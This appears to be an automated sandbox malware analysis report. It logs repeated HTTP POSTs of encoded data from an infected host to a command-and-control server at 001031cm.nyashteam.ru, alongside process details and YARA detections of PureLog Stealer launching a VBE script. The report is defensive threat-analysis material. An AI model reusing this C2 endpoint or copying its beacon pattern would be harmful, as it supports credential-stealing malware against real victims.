Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
5 | 192.168.2.4 | 49768 | 172.67.186.200 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 28, 2024 23:48:17.129587889 CET | 349 | OUT | POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 001031cm.nyashteam.ru
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive
Dec 28, 2024 23:48:17.476095915 CET | 344 | OUT | Data Raw: 00 04 01 06 06 0b 01 07 05 06 02 01 02 01 01 06 00 0b 05 08 02 06 03 0b 00 04 0d 03 05 07 01 02 0d 55 05 0c 02 0c 04 06 0d 02 05 51 05 05 07 05 04 06 0f 0e 0f 52 06 07 05 07 04 02 01 03 06 0d 03 0b 0d 0c 06 0f 04 01 0b 03 0e 07 0d 02 0f 51 04 00
Data Ascii: UQRQR]WRQQ\L}Pkcvc[r_u[kQ~lS`h`k^l{xcfJ}}xwl~e~V@{mPA}\}
Dec 28, 2024 23:48:18.263000965 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 28, 2024 23:48:18.505753994 CET | 1028 | IN | HTTP/1.1 404 Not Found
Date: Sat, 28 Dec 2024 22:48:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5tcy1f9wSve3aZE0AU97eF5%2BAqUnNSW1P8p0%2FfWF1besIL6DHwdxNHSOBZhEgpAMgIXH3tZy8GERQ%2FGo29ZgP5OIsaFgPrx9WDxR0Qx15RiFRDoEQqyMf%2FgaYkbg3h8xU6L2VLzvQgc%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f9518d92c22efa5-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=4954&min_rtt=1976&rtt_var=6697&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=693&delivery_rate=56584&cwnd=199&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            6192.168.2.449773172.67.186.20080
                                                            TimestampBytes transferredDirectionData
                                                            Dec 28, 2024 23:48:20.338089943 CET366OUTPOST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                            Host: 001031cm.nyashteam.ru
                                                            Content-Length: 344
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 28, 2024 23:48:20.693634033 CET | 344 | OUT | Data Raw: 00 0b 04 07 03 0f 01 04 05 06 02 01 02 0c 01 01 00 02 05 0c 02 06 03 0f 02 05 0d 57 04 52 03 57 0e 0f 03 01 03 0c 07 01 0c 0b 06 02 00 04 07 54 07 03 0d 01 0a 05 06 56 04 01 05 01 01 05 05 0a 02 54 0a 09 04 03 04 03 0e 54 0b 05 0d 02 0c 03 07 50
                                                            Data Ascii: WRWTVTTPUP\L}S^zt\}vKThRvYvl`O~ptK{Rox^~kSZN`gk[u~V@xSr}\S
                                                            Dec 28, 2024 23:48:21.422271013 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 28, 2024 23:48:21.657381058 CET | 1026 | IN | HTTP/1.1 404 Not Found
                                                            Date: Sat, 28 Dec 2024 22:48:21 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8GsxJOGs%2BCR%2FxTCB3GfY931Rifo9vdTLvppvhuFRwBu1TR8g6Oir0HFSe9BjUOgacG08dXUmBuhgLaZoAwgW9yRg6wyZOXUUNcD9OzwxJFoL5tC3dV15Tc%2FL30Rf42CsOST3pYoRj5U%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f9518ece9310c9e-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3008&min_rtt=1590&rtt_var=3432&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=710&delivery_rate=112880&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            7 | 192.168.2.4 | 49825 | 172.67.186.200 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 28, 2024 23:48:43.523001909 CET | 349 | OUT | POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 001031cm.nyashteam.ru
                                                            Content-Length: 344
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 28, 2024 23:48:43.881140947 CET | 344 | OUT | Data Raw: 00 04 04 03 06 00 04 06 05 06 02 01 02 02 01 04 00 0b 05 0d 02 0c 03 09 03 07 0a 07 03 07 06 06 0a 06 05 0a 00 03 04 0a 0b 02 02 05 07 51 05 01 04 07 0f 01 0d 52 01 02 06 54 03 01 05 04 05 5f 03 01 0a 0e 05 55 06 06 0e 05 0e 02 0f 51 0e 51 05 0c
                                                            Data Ascii: QRT_UQQVU\L}Ssvcr}aShozYwR|LhZXxlsE{sfIhTlvt|}u~V@{CPru
                                                            Dec 28, 2024 23:48:44.618026972 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 28, 2024 23:48:44.855725050 CET | 1021 | IN | HTTP/1.1 404 Not Found
                                                            Date: Sat, 28 Dec 2024 22:48:44 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z8V%2BwyF1uA5Yp72w8ewnVsedizpmiGLnEvK%2FBKH5BPQWjbDNZN0BUIolEGWY7jR1K8m0H0UrycQvbnBI6uSEnXtUS%2FvO0bW2l21s2kGsSsNTXJvnRPAc60I8auJcij1NG24W2G8SJsw%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f95197ded68efa7-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=6728&min_rtt=4296&rtt_var=6476&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=693&delivery_rate=61450&cwnd=160&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                            Dec 28, 2024 23:48:45.047370911 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            8 | 192.168.2.4 | 49845 | 172.67.186.200 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 28, 2024 23:48:51.832592010 CET | 313 | OUT | POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                            Host: 001031cm.nyashteam.ru
                                                            Content-Length: 344
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 28, 2024 23:48:52.177519083 CET | 344 | OUT | Data Raw: 00 0b 04 03 03 08 04 07 05 06 02 01 02 07 01 0a 00 04 05 0f 02 04 03 0d 02 05 0e 07 04 54 03 04 0d 00 05 0c 03 0c 06 0a 0e 00 04 06 06 05 02 02 04 50 0d 0a 0e 00 01 07 04 50 04 02 07 0b 05 0b 02 56 0c 0b 06 06 07 51 0e 57 0d 57 0d 00 0e 56 06 04
                                                            Data Ascii: TPPVQWWVQ\L}S|cftqjYu`@|BiLcos^M`lRd[{fI|C^c^hL~e~V@AzmT}re
                                                            Dec 28, 2024 23:48:52.963706017 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 28, 2024 23:48:53.205905914 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                            Date: Sat, 28 Dec 2024 22:48:53 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hsl612QaSVc0G0dqc%2Fxjhqzrlfqeeub3rVcgAQdkB%2F84FGgzuDxD%2Fyhawyw%2BzryFH09q%2BA1fhwqvnqT6vyQmg1d6JavU%2Bd34CpdBTZYZDShTL%2Bt%2FIaMg9o7vMkBD2wftXZzHKXmySso%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f9519b20ff14291-EWR
                                                            alt-svc: h2=":443"; ma=60
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3491&min_rtt=1726&rtt_var=4177&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=657&delivery_rate=92125&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            9 | 192.168.2.4 | 49863 | 172.67.186.200 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 28, 2024 23:49:00.200450897 CET | 349 | OUT | POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 001031cm.nyashteam.ru
                                                            Content-Length: 344
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 28, 2024 23:49:00.552496910 CET | 344 | OUT | Data Raw: 00 02 01 05 06 08 04 05 05 06 02 01 02 07 01 03 00 04 05 09 02 0d 03 00 02 56 0e 01 06 02 01 55 0d 0f 06 0a 00 51 07 52 0f 01 05 04 07 53 05 05 06 54 0e 0c 0c 0f 07 52 05 0e 05 01 06 57 05 0b 00 53 0c 0b 07 05 04 53 0b 0f 0f 00 0f 53 0e 56 05 0d
                                                            Data Ascii: VUQRSTRWSSSVPZR\L~|`Tvbr^vulhlyvlkXc`oRwxN~J}nwS`^`}u~V@Ax}TNbW
                                                            Dec 28, 2024 23:49:01.284025908 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 28, 2024 23:49:01.516635895 CET | 1029 | IN | HTTP/1.1 404 Not Found
                                                            Date: Sat, 28 Dec 2024 22:49:01 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=95yMMf7ma3E42dD%2FBGaUArvuFurjVD00Kmh2Lc84eDpsM3ShOL904jZykdR8XW4eqskvOj5jc0oKjc7ngh%2BzIHQF9PpoO6aeb%2BUtlC49w2b4lg3SFiDELvcCnjhEevmPu5eIR17ra%2FQ%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f9519e61834184d-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=6981&min_rtt=1515&rtt_var=11501&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=693&delivery_rate=32265&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            10 | 192.168.2.4 | 49883 | 172.67.186.200 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 28, 2024 23:49:09.141928911 CET | 366 | OUT | POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: 001031cm.nyashteam.ru
                                                            Content-Length: 344
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 28, 2024 23:49:09.490153074 CET | 344 | OUT | Data Raw: 05 02 04 00 06 08 01 0b 05 06 02 01 02 07 01 0a 00 07 05 0c 02 04 03 0b 02 00 0c 07 04 05 01 50 0a 04 07 59 01 54 06 50 0d 01 02 01 00 02 05 51 06 0b 0c 01 0a 03 07 05 06 00 03 00 05 52 00 00 05 07 0c 0b 00 07 06 06 0f 0f 0f 05 0c 05 0b 04 02 04
                                                            Data Ascii: PYTPQRUU\L~hYi[wb_bfoThRSLvot`lxUczciZ}cR`Y|iO~V@Azmf}r}
                                                            Dec 28, 2024 23:49:10.318157911 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 28, 2024 23:49:10.575022936 CET | 1030 | IN | HTTP/1.1 404 Not Found
                                                            Date: Sat, 28 Dec 2024 22:49:10 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EzSfThgCKVTshNWhuA%2FIL5VmW6oMDdBw1fQ9hM9zx7e6IvM8Dzn0iEk6cQjIUOWv3HKCKSbHOJRXMI2XKbC2ODzGDdsjJ08RoJ6fcCBQGcv5oc0c%2BD%2BHpdnr%2FAATaOb5hno7k0%2BgVSE%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f951a1e7efdc481-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3890&min_rtt=1502&rtt_var=5340&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=710&delivery_rate=70835&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            11 | 192.168.2.4 | 49892 | 172.67.186.200 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 28, 2024 23:49:12.404839993 CET | 349 | OUT | POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 001031cm.nyashteam.ru
                                                            Content-Length: 344
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 28, 2024 23:49:12.755798101 CET | 344 | OUT | Data Raw: 05 07 01 06 03 0d 04 06 05 06 02 01 02 0d 01 00 00 07 05 0a 02 06 03 0a 02 03 0f 51 06 50 02 03 0d 05 06 5b 02 56 03 05 0e 0a 02 02 06 02 04 0f 07 05 0f 0c 0c 0e 07 01 06 53 07 06 07 07 00 0d 05 00 0a 0a 00 03 01 09 0f 03 0b 03 0f 03 0f 07 02 06
                                                            Data Ascii: QP[VSTRR\L~~sa\cqmbe^AklywltBMhx|d_o`rIkCxt_}e~V@xCfO}\y
                                                            Dec 28, 2024 23:49:13.536200047 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 28, 2024 23:49:13.777905941 CET | 1029 | IN | HTTP/1.1 404 Not Found
                                                            Date: Sat, 28 Dec 2024 22:49:13 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R7cn30SK6QwT3L4N1bHvSfemvPJDHwqCadhDh%2F5vTEbhHsPMGxYSt9rncXqGLuSOQT1%2FNtlyywGDdJFBm3TLtMtdsnpqJol%2BjUiFa90ivWNmKl7w1oSFd0mP93hsOUp0PR7bSr%2F1I7I%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f951a32ad957d08-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3286&min_rtt=1925&rtt_var=3444&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=693&delivery_rate=113928&cwnd=176&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                            Target ID:0
                                                            Start time:17:47:04
                                                            Start date:28/12/2024
                                                            Path:C:\Users\user\Desktop\EjS7Q5fFCE.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\EjS7Q5fFCE.exe"
                                                            Imagebase:0x420000
                                                            File size:2'009'852 bytes
                                                            MD5 hash:5FA3D2D795206F9981B7BD191C423D65
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1668240113.0000000006958000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1669422200.00000000052BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1668710147.00000000052B2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:1
                                                            Start time:17:47:05
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\ComproviderComponentIntocommon\9ILuIMngNdMuzngHHMAY9BVvKTDwm0yZ13RpFsRY.vbe"
                                                            Imagebase:0xf80000
                                                            File size:147'456 bytes
                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
